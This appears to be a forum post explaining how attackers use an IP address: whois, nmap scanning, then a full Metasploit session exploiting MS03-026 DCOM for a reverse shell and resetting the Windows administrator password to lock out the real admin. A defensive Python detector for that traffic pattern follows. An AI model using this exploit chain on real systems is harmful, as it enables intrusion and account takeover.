Yeah, I was joking. I'm Caucasian and European, so if they want to mess
with me they'll have to fuck with the whole US. But joking aside, because people can
easily find out other peeps' IP addresses, I was like that's fucked up if
they can do all this shit.
If they have your IP address they can identify the 'target' host(s). How?
(Lots of different ways.) One way: a simple whois query from
can give them this information.
Once they have this information, they can easily fire up their favorite
port scanner, nmap for example, and scan your system to find open ports.
Why are they looking to find open ports?
Because open ports mean the system is listening.
Identify applications, servers, and so on that are running on your system
(based on the open ports they found); again, nmap can do this.
Next, find exploits specific to those applications and servers (if any).
Nessus and GFI, both free, can do this. Metasploit has a nice selection of
exploits. Sites such as
can assist as well.
Next step: exploit the system.
Metasploit can easily do this.
[*] Starting the Metasploit Framework...
__. .__. .__. __.
_____ _____/ |______ ____________ | | ____ |__|/ |_
/ \_/ __ \ __\__ \ / ___/\____ \| | / _ \| \ __\
| Y Y \ ___/| | / __ \_\___ \ | |_> > |_( <_> ) || |
|__|_| /\___ >__| (____ /____ >| __/|____/\____/|__||__|
\/ \/ \/ \/ |__|
+ -- --=[ msfconsole v2.7 [158 exploits - 76 payloads]
msf > use msrpc_dcom_ms03_026
msf msrpc_dcom_ms03_026 > set PAYLOAD win32_reverse
PAYLOAD -> win32_reverse
msf msrpc_dcom_ms03_026(win32_reverse) > set RHOST 192.168.1.101
RHOST -> 192.168.1.101
msf msrpc_dcom_ms03_026(win32_reverse) > set RPORT 135
RPORT -> 135
msf msrpc_dcom_ms03_026(win32_reverse) > set LHOST 192.168.1.100
LHOST -> 192.168.1.100
msf msrpc_dcom_ms03_026(win32_reverse) > set LPORT 4321
LPORT -> 4321
msf msrpc_dcom_ms03_026(win32_reverse) > exploit
[*] Starting Reverse Handler.
[*] Sending request...
[*] Got connection from 192.168.1.100:4321 <-> 192.168.1.101:3054
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>net users administrator *
Type a password for the user:
Retype the password to confirm:
The command completed successfully.
C:\WINDOWS\system32>
Caught interrupt, exit connection? [y/n] y
[*] Exiting Reverse Handler.
msf msrpc_dcom_ms03_026(win32_reverse) >
Box is now owned, and I changed the admin password for later entry into the system and to block out the real admin. This is a little demo on a PC on my network.
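The session above has a recognisable network footprint: an inbound connection to the RPC port (135) from a peer, followed within seconds by an outbound connection from the victim back to that same peer on an unusual high port (the reverse handler on 4321). The following detector is an added example written for this thread, not code from the post or from Metasploit; the log line format and the firewall log itself are constructed, reusing the two addresses and ports shown in the session.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed firewall log for the host 192.168.1.101 (the RHOST in the session).
# Assumed format: "<ISO time> <IN|OUT> TCP <src>:<sport> -> <dst>:<dport>".
SAMPLE_LOG = """\
2004-01-10T12:00:01 IN  TCP 192.168.1.100:50000 -> 192.168.1.101:135
2004-01-10T12:00:03 OUT TCP 192.168.1.101:3054 -> 192.168.1.100:4321
2004-01-10T12:05:00 IN  TCP 192.168.1.50:40000 -> 192.168.1.101:135
2004-01-10T12:30:00 OUT TCP 192.168.1.101:3100 -> 192.168.1.50:80
"""

LINE_RE = re.compile(r"^(\S+)\s+(IN|OUT)\s+TCP\s+(\S+):(\d+)\s+->\s+(\S+):(\d+)$")


def parse(log):
    """Turn log text into (time, direction, src, sport, dst, dport) tuples."""
    events = []
    for line in log.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # skip lines that do not fit the assumed format
        ts, direction, src, sport, dst, dport = m.groups()
        events.append((datetime.fromisoformat(ts), direction, src, int(sport), dst, int(dport)))
    return events


def find_reverse_shell_after_rpc(log, window=timedelta(minutes=2),
                                 rpc_ports=(135,), service_ports=(80, 443)):
    """Flag peers that hit our RPC port and then received an outbound connection
    from us to a non-service port within `window` (the reverse-handler pattern)."""
    events = parse(log)
    inbound = defaultdict(list)  # peer address -> times it connected to an RPC port
    alerts = []
    for ts, direction, src, sport, dst, dport in events:
        if direction == "IN" and dport in rpc_ports:
            inbound[src].append(ts)
        elif direction == "OUT" and dport not in service_ports:
            for t in inbound.get(dst, []):
                if timedelta(0) <= ts - t <= window:
                    alerts.append({"peer": dst, "rpc_at": t,
                                   "callback_port": dport, "callback_at": ts})
                    break
    return alerts


if __name__ == "__main__":
    for a in find_reverse_shell_after_rpc(SAMPLE_LOG):
        print(f"possible reverse shell to {a['peer']}:{a['callback_port']} at {a['callback_at']}")
```

The second peer (192.168.1.50) also touched port 135 but only ever received ordinary web traffic back, so it is not flagged; tune `window` and `service_ports` to what is normal on your segment.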